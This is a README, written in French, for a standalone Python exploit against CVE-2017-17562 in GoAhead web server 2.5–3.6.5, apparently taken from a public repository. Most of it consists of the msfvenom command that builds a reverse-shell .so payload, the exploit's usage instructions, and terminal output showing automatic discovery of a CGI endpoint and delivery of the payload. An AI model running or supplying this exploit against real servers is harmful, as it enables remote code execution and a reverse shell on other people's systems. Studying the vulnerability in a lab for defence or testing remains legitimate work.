
Exploit Python 3 autonome pour CVE-2017-17562 ciblant le serveur web GoAhead 2.5–3.6.5 avec découverte automatisée des points de terminaison CGI et livraison de payloads de shell inverse.
Exploit standalone en Python 3 de reverse shell pour CVE-2017-17562, fonctionne sur les versions 2.5 < 3.6.5 du serveur web GoAhead.
Article de blog ici.
Écrit et testé sur Python 3.7 basé sur POC et environnement vulnérable ici. Du code emprunté au module Metasploit.
POC originale trouvée ici. J'ai écrit celui-ci car je n'arrivais pas à faire fonctionner l'exploit POC original, et j'ai réalisé qu'il manquait une fonction pour rechercher le module CGI à exploiter, c'est-à-dire qu'il oblige l'utilisateur à spécifier son emplacement ou à fournir une wordlist pour une recherche récursive.
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] [-cgipath CGIPATH] -payload
PAYLOAD
Generate the payload first, eg:
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o dir/payload.so
Required arguments:
-rhost RHOST Target host running Go Ahead webserver eg. 192.168.92.153
-payload PAYLOAD Path to the malicious elf-so payload. eg dir/payload.so
Optional arguments:
-rport RPORT Target port running GoAhead webserver. Default: 8080
-cgipath CGIPATH The path to a CGI script on the GoAhead server Default: '/cgi-bin' as in http://192.168.92.153/cgi-bin
Call the exploit like this:
./exploit.py -rhost 192.168.92.153 -rport 8080 -cgipath /cgi-bin/index -payload dir/payload.so
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -rhost 192.168.92.153 -rport 8080 -payload payload3.so
Searching 390 paths for an exploitable CGI endpoint...
Exploitable CGI located at /cgi-bin/index
Sending payload...